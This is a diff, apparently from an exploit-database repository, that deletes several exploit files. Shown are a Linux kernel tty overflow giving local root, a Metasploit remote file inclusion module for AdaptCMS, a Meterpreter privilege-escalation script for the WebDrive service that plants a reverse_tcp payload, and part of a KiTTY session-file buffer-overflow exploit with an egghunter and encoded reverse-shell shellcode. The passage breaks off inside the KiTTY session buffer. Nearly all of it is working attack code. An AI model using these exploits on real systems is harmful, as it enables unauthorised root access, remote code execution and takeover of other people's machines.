- * GFP_ATOMIC memory consumption") that make exploitation simpler, which this
- * exploit relies on.
- *
- * Thanks to Jon Oberheide for his help on exploitation technique.
- */
-
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <fcntl.h>
-#include <pthread.h>
-#include <pty.h>
-#include <stdio.h>
-#include <string.h>
-#include <termios.h>
-#include <unistd.h>
-
-#define TTY_MAGIC 0x5401
-
-#define ONEOFF_ALLOCS 200
-#define RUN_ALLOCS    30
-
-struct device;
-struct tty_driver;
-struct tty_operations;
-
-typedef struct {
-	int counter;
-} atomic_t;
-
-struct kref {
-	atomic_t refcount;
-};
-
-struct tty_struct_header {
-	int	magic;
-	struct kref kref;
-	struct device *dev;
-	struct tty_driver *driver;
-	const struct tty_operations *ops;
-} overwrite;
-
-typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);
-typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);
-
-int master_fd, slave_fd;
-char buf[1024] = {0};
-commit_creds_fn commit_creds;
-prepare_kernel_cred_fn prepare_kernel_cred;
-
-int payload(void) {
-	commit_creds(prepare_kernel_cred(0));
-
-	return 0;
-}
-
-unsigned long get_symbol(char *target_name) {
-	FILE *f;
-	unsigned long addr;
-	char dummy;
-	char name[256];
-	int ret = 0;
-
-	f = fopen("/proc/kallsyms", "r");
-	if (f == NULL)
-		return 0;
-
-	while (ret != EOF) {
-		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);
-		if (ret == 0) {
-			fscanf(f, "%s\n", name);
-			continue;
-		}
-
-		if (!strcmp(name, target_name)) {
-			printf("[+] Resolved %s: %p\n", target_name, (void *)addr);
-
-			fclose(f);
-			return addr;
-		}
-	}
-
-	printf("[-] Couldn't resolve \"%s\"\n", name);
-
-	fclose(f);
-	return 0;
-}
-
-void *overwrite_thread_fn(void *p) {
-	write(slave_fd, buf, 511);
-
-	write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
-	write(slave_fd, &overwrite, sizeof(overwrite));
-}
-
-int main() {
-	char scratch[1024] = {0};
-	void *tty_operations[64];
-	int i, temp_fd_1, temp_fd_2;
-
-	for (i = 0; i < 64; ++i)
-		tty_operations[i] = payload;
-
-	overwrite.magic                 = TTY_MAGIC;
-	overwrite.kref.refcount.counter = 0x1337;
-	overwrite.dev                   = (struct device *)scratch;
-	overwrite.driver                = (struct tty_driver *)scratch;
-	overwrite.ops                   = (struct tty_operations *)tty_operations;
-
-	puts("[+] Resolving symbols");
-
-	commit_creds = (commit_creds_fn)get_symbol("commit_creds");
-	prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");
-	if (!commit_creds || !prepare_kernel_cred)
-		return 1;
-
-	puts("[+] Doing once-off allocations");
-
-	for (i = 0; i < ONEOFF_ALLOCS; ++i)
-		if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {
-			puts("[-] pty creation failed");
-			return 1;
-		}
-
-	printf("[+] Attempting to overflow into a tty_struct...");
-	fflush(stdout);
-
-	for (i = 0; ; ++i) {
-		struct termios t;
-		int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;
-		pthread_t overwrite_thread;
-
-		if (!(i & 0xfff)) {
-			putchar('.');
-			fflush(stdout);
-		}
-
-		if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
-			puts("\n[-] pty creation failed");
-			return 1;
-		}
-
-		for (j = 0; j < RUN_ALLOCS; ++j)
-			if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
-				puts("\n[-] pty creation failed");
-				return 1;
-			}
-
-		close(fds[RUN_ALLOCS / 2]);
-		close(fds2[RUN_ALLOCS / 2]);
-
-		write(slave_fd, buf, 1);
-
-		tcgetattr(master_fd, &t);
-		t.c_oflag &= ~OPOST;
-		t.c_lflag |= ECHO;
-		tcsetattr(master_fd, TCSANOW, &t);
-
-		if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {
-			puts("\n[-] Overwrite thread creation failed");
-			return 1;
-		}
-		write(master_fd, "A", 1);
-		pthread_join(overwrite_thread, NULL);
-
-		for (j = 0; j < RUN_ALLOCS; ++j) {
-			if (j == RUN_ALLOCS / 2)
-				continue;
-
-			ioctl(fds[j], 0xdeadbeef);
-			ioctl(fds2[j], 0xdeadbeef);
-
-			close(fds[j]);
-			close(fds2[j]);
-		}
-
-		ioctl(master_fd, 0xdeadbeef);
-		ioctl(slave_fd, 0xdeadbeef);
-
-		close(master_fd);
-		close(slave_fd);
-
-		if (!setresuid(0, 0, 0)) {
-			setresgid(0, 0, 0);
-
-			puts("\n[+] Got it :)");
-			execl("/bin/bash", "/bin/bash", NULL);
-		}
-	}
-}
diff --git a/platforms/php/webapps/15237.txt b/platforms/php/webapps/15237.txt
deleted file mode 100755
index aad0da8e6..000000000
--- a/platforms/php/webapps/15237.txt
+++ /dev/null
@@ -1,83 +0,0 @@
-##
-#      )   )            )                     (   (         (   (    (       )     ) 
-#  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
-#  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
-# ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
-#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
-#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
-# \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
-#  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
-#										.WEB.ID
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::Tcp
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::Remote::HttpServer::PHPInclude
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
-			'Description'    => %q{
-					This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.
-
-			},
-			'Author'         => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision:$',
-			'References'     => 				
-				[
-					[ 'CVE', '2010-2618' ],
-					[ 'BID', '41116' ],
-				],
-			'Privileged'     => false,
-			'Payload'        =>
-				{
-					'DisableNops' => true,
-					'Compat'      =>
-						{
-							'ConnectionType' => 'find',
-						},
-					'Space'       => 262144, # 256k
-				},
-			'Platform'       => 'php',
-			'Arch'           => ARCH_PHP,
-			'Targets'        => [[ 'Automatic', { }]],
-			'DisclosureDate' => 'Oct 12 2010',
-			'DefaultTarget' => 0))
-
-		register_options([
-			OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
-			], self.class)
-	end
-
-	def php_exploit
-
-		timeout = 0.01
-		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
-		print_status("Trying uri #{uri}")
-
-		response = send_request_raw( {
-				'global' => true,
-				'uri' => uri,
-			},timeout)
-
-		if response and response.code != 200
-			print_error("Server returned non-200 status code (#{response.code})")
-		end
-		
-		handler
-	end
-
-end
\ No newline at end of file
diff --git a/platforms/windows/local/11264.txt b/platforms/windows/local/11264.txt
deleted file mode 100755
index 29c6ce597..000000000
--- a/platforms/windows/local/11264.txt
+++ /dev/null
@@ -1,119 +0,0 @@
-##
-# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
-#
-#  This module exploits a privilege escalation vulnerability in South River Technologies WebDrive. 
-#  Due to an empty security descriptor, a local attacker can gain elevated privileges.
-#  Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
-#  Vulnerability mitigation featured.
-#
-#  Credit:
-#   - Discovery			- Nine:Situations:Group::bellick
-#   - Meterpreter script	- Trancer
-#
-#  References:
-#   - http://retrogod.altervista.org/9sg_south_river_priv.html
-#   - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
-#   - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
-#   - http://osvdb.org/show/osvdb/59080
-#
-#  mtrancer[@]gmail.com
-#  http://www.rec-sec.com
-##
-
-#
-# Options
-#
-opts = Rex::Parser::Arguments.new(
-	"-h"  => [ false,  "This help menu"],
-	"-m"  => [ false,  "Mitigate"],
-	"-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
-	"-p"  => [ true,   "The port on the remote host where Metasploit is listening"]
-)
-
-#
-# Default parameters
-#
-
-rhost = Rex::Socket.source_address("1.2.3.4")
-rport = 4444
-sname = 'WebDriveService'
-pname = 'wdService.exe'
-
-#
-# Option parsing
-#
-opts.parse(args) do |opt, idx, val|
-	case opt
-	when "-h"
-		print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
-		print_line(opts.usage)
-		raise Rex::Script::Completed
-	when "-m"
-		client.sys.process.get_processes().each do |m|
-			if ( m['name'] == pname )
-				print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
-				
-				# Set correct service security descriptor to mitigate the vulnerability
-				print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
-				client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
-			end
-		end
-		raise Rex::Script::Completed
-	when "-r"
-		rhost = val
-	when "-p"
-		rport = val.to_i
-	end
-end
-
-client.sys.process.get_processes().each do |m|
-	if ( m['name'] == pname )
-
-		print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
-
-		# Build out the exe payload.
-		pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
-		pay.datastore['LHOST'] = rhost
-		pay.datastore['LPORT'] = rport
-		raw  = pay.generate
-
-		exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
-
-		# Place our newly created exe in %TEMP%
-		tempdir = client.fs.file.expand_path("%TEMP%")
-		tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-		print_status("Sending EXE payload '#{tempexe}'.")
-		fd = client.fs.file.new(tempexe, "wb")
-		fd.write(exe)
-		fd.close
-
-		# Stop the vulnerable service
-		print_status("Stopping service \"#{sname}\"...")
-		client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
-
-		# Set exe payload as service binpath
-		print_status("Setting \"#{sname}\" to #{tempexe}...")
-		client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
-		sleep(1)
-		
-		# Restart the service
-		print_status("Restarting the \"#{sname}\" service...")
-		client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
-
-		# Our handler to recieve the callback.
-		handler = client.framework.exploits.create("multi/handler")
-		handler.datastore['PAYLOAD'] 		= "windows/meterpreter/reverse_tcp"
-		handler.datastore['LHOST']   		= rhost
-		handler.datastore['LPORT']   		= rport
-		handler.datastore['ExitOnSession'] 	= false
-
-		handler.exploit_simple(
-			'Payload'	=> handler.datastore['PAYLOAD'],
-			'RunAsJob'	=> true
-		)
-
-		# Set service binpath back to normal
-		client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
-			
-	end
-end
diff --git a/platforms/windows/local/39120..py b/platforms/windows/local/39120..py
deleted file mode 100755
index 8a3e9a2b0..000000000
--- a/platforms/windows/local/39120..py
+++ /dev/null
@@ -1,412 +0,0 @@
-# Exploit Title: KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP, DoS 7/8.1/10)
-# Date: 28/12/2015
-# Exploit Author: Guillaume Kaddouch
-#	Twitter: @gkweb76
-#	Blog: http://networkfilter.blogspot.com
-#	GitHub: https://github.com/gkweb76/exploits
-# Vendor Homepage: http://www.9bis.net/kitty/
-# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
-# Version: 0.65.0.2p
-# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR)
-# Category: Local
-
-
-"""
-Disclosure Timeline:
---------------------
-2015-09-13: Vulnerability discovered
-2015-09-26: Vendor contacted
-2015-09-28: Vendor answer
-2015-10-09: KiTTY 0.65.0.3p released, still vulnerable
-2015-10-20: KiTTY 0.65.1.1p released, still vulnerable
-2015-11-15: KiTTY 0.66.6.1p released, seems fixed
-2015-12-28: exploit published
-
-Description :
--------------
-A local overflow exists in the session file used by KiTTY portable, in the HostName parameter. It is possible to write
-an overly long string to trigger an overflow. It can be used to trigger code execution on Windows XP SP3, or to crash
-the program from Windows 7 to Windows 10. It has been tested with KiTTY portable 0.65.0.2p/0.65.0.3p/0.65.1.1p, but earlier versions are
-likely to be vulnerable too.
-
-WinXP  -> Local Code Execution
-Win7   -> Denial Of Service
-Win8.1 -> Denial Of Service
-Win10  -> Denial Of Service
-
-Instructions:
--------------
-- Run exploit
-- Launch KiTTY, select "EvilSession" on the session list, then click "Load".
-
-Exploitation:
--------------
-When writing a 1500 bytes string to the HostName parameter in a session file, EIP is overwritten at offset 1232.
-As ESP points to our buffer, we use an address doing a JMP ESP in an unprotected DLL. However, as the memory area
-we land in is not reliable for bigger shellcode such as reverse shell, using an egg hunter is required. The final
-shellcode is written into another session parameter, LogFileName. After successful exploitation, a reverse shell
-is given if this payload has been selected on Windows XP SP3 (on Windows 7/8.1/10, KiTTY crashes):
-
-guillaume@kali64:~/tools$ nc -nlvp 4444
-listening on [any] 4444 ...
-connect to [192.168.135.131] from (UNKNOWN) [192.168.135.130] 1955
-Microsoft Windows XP [version 5.1.2600]
-(C) Copyright 1985-2001 Microsoft Corp.
-
-C:\kitty\App\KiTTY>
-
-"""
-
-egg = "w00t" # \x77\x30\x30\x74
-
-# Windows NtAccessCheckAndAuditAlarm EggHunter
-# Size: 32 bytes
-egghunter = (
-"\x66\x81\xca\xff\x0f"	# or dx,0x0fff
-"\x42"					# inc edx
-"\x52"					# push edx
-"\x6a\x02"				# push byte +0x02
-"\x58"					# pop eax
-"\xcd\x2e"				# int 0x2e
-"\x3c\x05"				# cmp al,0x5
-"\x5a"					# pop edx
-"\x74\xef"				# jz 0x0
-"\xb8\x77\x30\x30\x74"	# mov eax,0x74303077 ; egg
-"\x8b\xfa"				# mov edi,edx
-"\xaf"					# scasd
-"\x75\xea"				# jnz 0x5
-"\xaf"					# scasd
-"\x75\xe7"				# jnz 0x5
-"\xff\xe7"				# jmp edi
-)
-
-# Metasploit Reverse Shell 192.168.135.131:4444 (replace it with any shellcode you want)
-# Encoder: x86/shikata_ga_nai
-# Bad chars: '\x00\x0a\x0d\x5c'
-# Size: 351 bytes
-shellcode = (
-"\xb8\xa9\xbf\xda\xcb\xdd\xc0\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
-"\x52\x83\xee\xfc\x31\x46\x0e\x03\xef\xb1\x38\x3e\x13\x25\x3e"
-"\xc1\xeb\xb6\x5f\x4b\x0e\x87\x5f\x2f\x5b\xb8\x6f\x3b\x09\x35"
-"\x1b\x69\xb9\xce\x69\xa6\xce\x67\xc7\x90\xe1\x78\x74\xe0\x60"
-"\xfb\x87\x35\x42\xc2\x47\x48\x83\x03\xb5\xa1\xd1\xdc\xb1\x14"
-"\xc5\x69\x8f\xa4\x6e\x21\x01\xad\x93\xf2\x20\x9c\x02\x88\x7a"
-"\x3e\xa5\x5d\xf7\x77\xbd\x82\x32\xc1\x36\x70\xc8\xd0\x9e\x48"
-"\x31\x7e\xdf\x64\xc0\x7e\x18\x42\x3b\xf5\x50\xb0\xc6\x0e\xa7"
-"\xca\x1c\x9a\x33\x6c\xd6\x3c\x9f\x8c\x3b\xda\x54\x82\xf0\xa8"
-"\x32\x87\x07\x7c\x49\xb3\x8c\x83\x9d\x35\xd6\xa7\x39\x1d\x8c"
-"\xc6\x18\xfb\x63\xf6\x7a\xa4\xdc\x52\xf1\x49\x08\xef\x58\x06"
-"\xfd\xc2\x62\xd6\x69\x54\x11\xe4\x36\xce\xbd\x44\xbe\xc8\x3a"
-"\xaa\x95\xad\xd4\x55\x16\xce\xfd\x91\x42\x9e\x95\x30\xeb\x75"
-"\x65\xbc\x3e\xd9\x35\x12\x91\x9a\xe5\xd2\x41\x73\xef\xdc\xbe"
-"\x63\x10\x37\xd7\x0e\xeb\xd0\x18\x66\x74\xa3\xf1\x75\x7a\xb5"
-"\x5d\xf3\x9c\xdf\x4d\x55\x37\x48\xf7\xfc\xc3\xe9\xf8\x2a\xae"
-"\x2a\x72\xd9\x4f\xe4\x73\x94\x43\x91\x73\xe3\x39\x34\x8b\xd9"
-"\x55\xda\x1e\x86\xa5\x95\x02\x11\xf2\xf2\xf5\x68\x96\xee\xac"
-"\xc2\x84\xf2\x29\x2c\x0c\x29\x8a\xb3\x8d\xbc\xb6\x97\x9d\x78"
-"\x36\x9c\xc9\xd4\x61\x4a\xa7\x92\xdb\x3c\x11\x4d\xb7\x96\xf5"
-"\x08\xfb\x28\x83\x14\xd6\xde\x6b\xa4\x8f\xa6\x94\x09\x58\x2f"
-"\xed\x77\xf8\xd0\x24\x3c\x08\x9b\x64\x15\x81\x42\xfd\x27\xcc"
-"\x74\x28\x6b\xe9\xf6\xd8\x14\x0e\xe6\xa9\x11\x4a\xa0\x42\x68"
-"\xc3\x45\x64\xdf\xe4\x4f"
-)
-
-junk 	= '\x41' * 1232
-ret 	= '\x7B\x46\x86\x7C' # 0x7C86467B / jmp esp / kernel32.dll
-nops 	= '\x90' * 8
-eggmark = egg * 2
-padding = '\x42' * (1500 - len(junk) - len(ret) - len(egghunter))
-
-payload1 = junk + ret + egghunter + padding # Egg Hunter
-payload2 = eggmark + nops + shellcode		# Final Shellcode
-
-# A whole KiTTY session file, written to \Sessions\EvilSession"
-buffer  = "PortKnocking\\\\\r"
-buffer += "ACSinUTF\\0\\\r"
-buffer += "Comment\\\\\r"
-buffer += "CtrlTabSwitch\\0\\\r"
-buffer += "Password\\1350b\\\r"
-buffer += "ForegroundOnBell\\0\\\r"
-buffer += "SaveWindowPos\\0\\\r"
-buffer += "WindowState\\0\\\r"
-buffer += "TermYPos\\-1\\\r"
-buffer += "TermXPos\\-1\\\r"
-buffer += "LogTimeRotation\\0\\\r"
-buffer += "Folder\\Default\\\r"
-buffer += "AutocommandOut\\\\\r"
-buffer += "Autocommand\\\\\r"
-buffer += "LogTimestamp\\\\\r"
-buffer += "AntiIdle\\\\\r"
-buffer += "ScriptfileContent\\\\\r"
-buffer += "Scriptfile\\\\\r"
-buffer += "SFTPConnect\\\\\r"
-buffer += "IconeFile\\\\\r"
-buffer += "Icone\\1\\\r"
-buffer += "SaveOnExit\\0\\\r"
-buffer += "Fullscreen\\0\\\r"
-buffer += "Maximize\\0\\\r"
-buffer += "SendToTray\\0\\\r"
-buffer += "TransparencyValue\\0\\\r"
-buffer += "zDownloadDir\\C%3A%5C\\\r"
-buffer += "szOptions\\-e%20-v\\\r"
-buffer += "szCommand\\\\\r"
-buffer += "rzOptions\\-e%20-v\\\r"
-buffer += "rzCommand\\\\\r"
-buffer += "CygtermCommand\\\\\r"
-buffer += "Cygterm64\\0\\\r"
-buffer += "CygtermAutoPath\\1\\\r"
-buffer += "CygtermAltMetabit\\0\\\r"
-buffer += "HyperlinkRegularExpression\\(((https%3F%7Cftp)%3A%5C%2F%5C%2F)%7Cwww%5C.)(([0-9]+%5C.[0-9]+%5C.[0-9]+%5C.[0-9]+)%7Clocalhost%7C([a-zA-Z0-9%5C-]+%5C.)%2A[a-zA-Z0-9%5C-]+%5C.(com%7Cnet%7Corg%7Cinfo%7Cbiz%7Cgov%7Cname%7Cedu%7C[a-zA-Z][a-zA-Z]))(%3A[0-9]+)%3F((%5C%2F%7C%5C%3F)[^%20%22]%2A[^%20,;%5C.%3A%22%3E)])%3F\\\r"
-buffer += "HyperlinkRegularExpressionUseDefault\\1\\\r"
-buffer += "HyperlinkBrowser\\\\\r"
-buffer += "HyperlinkBrowserUseDefault\\1\\\r"
-buffer += "HyperlinkUseCtrlClick\\1\\\r"
-buffer += "HyperlinkUnderline\\0\\\r"
-buffer += "FailureReconnect\\0\\\r"
-buffer += "WakeupReconnect\\0\\\r"
-buffer += "SSHManualHostKeys\\\\\r"
-buffer += "ConnectionSharingDownstream\\1\\\r"
-buffer += "ConnectionSharingUpstream\\1\\\r"
-buffer += "ConnectionSharing\\0\\\r"
-buffer += "WindowClass\\\\\r"
-buffer += "SerialFlowControl\\1\\\r"
-buffer += "SerialParity\\0\\\r"
-buffer += "SerialStopHalfbits\\2\\\r"
-buffer += "SerialDataBits\\8\\\r"
-buffer += "SerialSpeed\\9600\\\r"
-buffer += "SerialLine\\COM1\\\r"
-buffer += "ShadowBoldOffset\\1\\\r"
-buffer += "ShadowBold\\0\\\r"
-buffer += "WideBoldFontHeight\\0\\\r"
-buffer += "WideBoldFontCharSet\\0\\\r"
-buffer += "WideBoldFontIsBold\\0\\\r"
-buffer += "WideBoldFont\\\\\r"
-buffer += "WideFontHeight\\0\\\r"
-buffer += "WideFontCharSet\\0\\\r"
-buffer += "WideFontIsBold\\0\\\r"
-buffer += "WideFont\\\\\r"
-buffer += "BoldFontHeight\\0\\\r"
-buffer += "BoldFontCharSet\\0\\\r"
-buffer += "BoldFontIsBold\\0\\\r"
-buffer += "BoldFont\\\\\r"
-buffer += "ScrollbarOnLeft\\0\\\r"
-buffer += "LoginShell\\1\\\r"
-buffer += "StampUtmp\\1\\\r"
-buffer += "BugChanReq\\0\\\r"
-buffer += "BugWinadj\\0\\\r"
-buffer += "BugOldGex2\\0\\\r"
-buffer += "BugMaxPkt2\\0\\\r"
-buffer += "BugRekey2\\0\\\r"
-buffer += "BugPKSessID2\\0\\\r"
-buffer += "BugRSAPad2\\0\\\r"
-buffer += "BugDeriveKey2\\0\\\r"
-buffer += "BugHMAC2\\0\\\r"
-buffer += "BugIgnore2\\0\\\r"
-buffer += "BugRSA1\\0\\\r"
-buffer += "BugPlainPW1\\0\\\r"
-buffer += "BugIgnore1\\0\\\r"
-buffer += "PortForwardings\\\\\r"
-buffer += "RemotePortAcceptAll\\0\\\r"
-buffer += "LocalPortAcceptAll\\0\\\r"
-buffer += "X11AuthFile\\\\\r"
-buffer += "X11AuthType\\1\\\r"
-buffer += "X11Display\\\\\r"
-buffer += "X11Forward\\0\\\r"
-buffer += "BlinkText\\0\\\r"
-buffer += "BCE\\1\\\r"
-buffer += "LockSize\\0\\\r"
-buffer += "EraseToScrollback\\1\\\r"
-buffer += "ScrollOnDisp\\1\\\r"
-buffer += "ScrollOnKey\\0\\\r"
-buffer += "ScrollBarFullScreen\\0\\\r"
-buffer += "ScrollBar\\1\\\r"
-buffer += "CapsLockCyr\\0\\\r"
-buffer += "Printer\\\\\r"
-buffer += "UTF8Override\\1\\\r"
-buffer += "CJKAmbigWide\\0\\\r"
-buffer += "LineCodePage\\\\\r"
-buffer += "Wordness224\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r"
-buffer += "Wordness192\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r"
-buffer += "Wordness160\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r"
-buffer += "Wordness128\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r"
-buffer += "Wordness96\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1\\\r"
-buffer += "Wordness64\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2\\\r"
-buffer += "Wordness32\\0,1,2,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1\\\r"
-buffer += "Wordness0\\0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0\\\r"
-buffer += "MouseOverride\\1\\\r"
-buffer += "RectSelect\\0\\\r"
-buffer += "MouseIsXterm\\0\\\r"
-buffer += "PasteRTF\\0\\\r"
-buffer += "RawCNP\\0\\\r"
-buffer += "Colour33\\187,187,187\\\r"
-buffer += "Colour32\\0,0,0\\\r"
-buffer += "Colour31\\187,187,187\\\r"
-buffer += "Colour30\\0,187,187\\\r"
-buffer += "Colour29\\187,0,187\\\r"
-buffer += "Colour28\\0,0,187\\\r"
-buffer += "Colour27\\187,187,0\\\r"
-buffer += "Colour26\\0,187,0\\\r"
-buffer += "Colour25\\187,0,0\\\r"
-buffer += "Colour24\\0,0,0\\\r"
-buffer += "Colour23\\0,0,0\\\r"
-buffer += "Colour22\\187,187,187\\\r"
-buffer += "Colour21\\255,255,255\\\r"
-buffer += "Colour20\\187,187,187\\\r"
-buffer += "Colour19\\85,255,255\\\r"
-buffer += "Colour18\\0,187,187\\\r"
-buffer += "Colour17\\255,85,255\\\r"
-buffer += "Colour16\\187,0,187\\\r"
-buffer += "Colour15\\85,85,255\\\r"
-buffer += "Colour14\\0,0,187\\\r"
-buffer += "Colour13\\255,255,85\\\r"
-buffer += "Colour12\\187,187,0\\\r"
-buffer += "Colour11\\85,255,85\\\r"
-buffer += "Colour10\\0,187,0\\\r"
-buffer += "Colour9\\255,85,85\\\r"
-buffer += "Colour8\\187,0,0\\\r"
-buffer += "Colour7\\85,85,85\\\r"
-buffer += "Colour6\\0,0,0\\\r"
-buffer += "Colour5\\0,255,0\\\r"
-buffer += "Colour4\\0,0,0\\\r"
-buffer += "Colour3\\85,85,85\\\r"
-buffer += "Colour2\\0,0,0\\\r"
-buffer += "Colour1\\255,255,255\\\r"
-buffer += "Colour0\\187,187,187\\\r"
-buffer += "SelectedAsColour\\0\\\r"
-buffer += "UnderlinedAsColour\\0\\\r"
-buffer += "BoldAsColourTest\\1\\\r"
-buffer += "DisableBottomButtons\\1\\\r"
-buffer += "WindowHasSysMenu\\1\\\r"
-buffer += "WindowMaximizable\\1\\\r"
-buffer += "WindowMinimizable\\1\\\r"
-buffer += "WindowClosable\\1\\\r"
-buffer += "BoldAsColour\\1\\\r"
-buffer += "Xterm256Colour\\1\\\r"
-buffer += "ANSIColour\\1\\\r"
-buffer += "TryPalette\\0\\\r"
-buffer += "UseSystemColours\\0\\\r"
-buffer += "FontVTMode\\4\\\r"
-buffer += "FontQuality\\0\\\r"
-buffer += "FontHeight\\10\\\r"
-buffer += "FontCharSet\\0\\\r"
-buffer += "FontIsBold\\0\\\r"
-buffer += "Font\\Courier%20New\\\r"
-buffer += "TermHeight\\24\\\r"
-buffer += "TermWidth\\80\\\r"
-buffer += "WinTitle\\\\\r"
-buffer += "WinNameAlways\\1\\\r"
-buffer += "DisableBidi\\0\\\r"
-buffer += "DisableArabicShaping\\0\\\r"
-buffer += "CRImpliesLF\\0\\\r"
-buffer += "LFImpliesCR\\0\\\r"
-buffer += "AutoWrapMode\\1\\\r"
-buffer += "DECOriginMode\\0\\\r"
-buffer += "ScrollbackLines\\10000\\\r"
-buffer += "BellOverloadS\\5000\\\r"
-buffer += "BellOverloadT\\2000\\\r"
-buffer += "BellOverloadN\\5\\\r"
-buffer += "BellOverload\\1\\\r"
-buffer += "BellWaveFile\\\\\r"
-buffer += "BeepInd\\0\\\r"
-buffer += "Beep\\1\\\r"
-buffer += "BlinkCur\\0\\\r"
-buffer += "CurType\\0\\\r"
-buffer += "WindowBorder\\1\\\r"
-buffer += "SunkenEdge\\0\\\r"
-buffer += "HideMousePtr\\0\\\r"
-buffer += "FullScreenOnAltEnter\\0\\\r"
-buffer += "AlwaysOnTop\\0\\\r"
-buffer += "Answerback\\KiTTY\\\r"
-buffer += "LocalEdit\\2\\\r"
-buffer += "LocalEcho\\2\\\r"
-buffer += "TelnetRet\\1\\\r"
-buffer += "TelnetKey\\0\\\r"
-buffer += "CtrlAltKeys\\1\\\r"
-buffer += "ComposeKey\\0\\\r"
-buffer += "AltOnly\\0\\\r"
-buffer += "AltSpace\\0\\\r"
-buffer += "AltF4\\1\\\r"
-buffer += "NetHackKeypad\\0\\\r"
-buffer += "ApplicationKeypad\\0\\\r"
-buffer += "ApplicationCursorKeys\\0\\\r"
-buffer += "NoRemoteCharset\\0\\\r"
-buffer += "NoDBackspace\\0\\\r"
-buffer += "RemoteQTitleAction\\1\\\r"
-buffer += "NoRemoteWinTitle\\0\\\r"
-buffer += "NoAltScreen\\0\\\r"
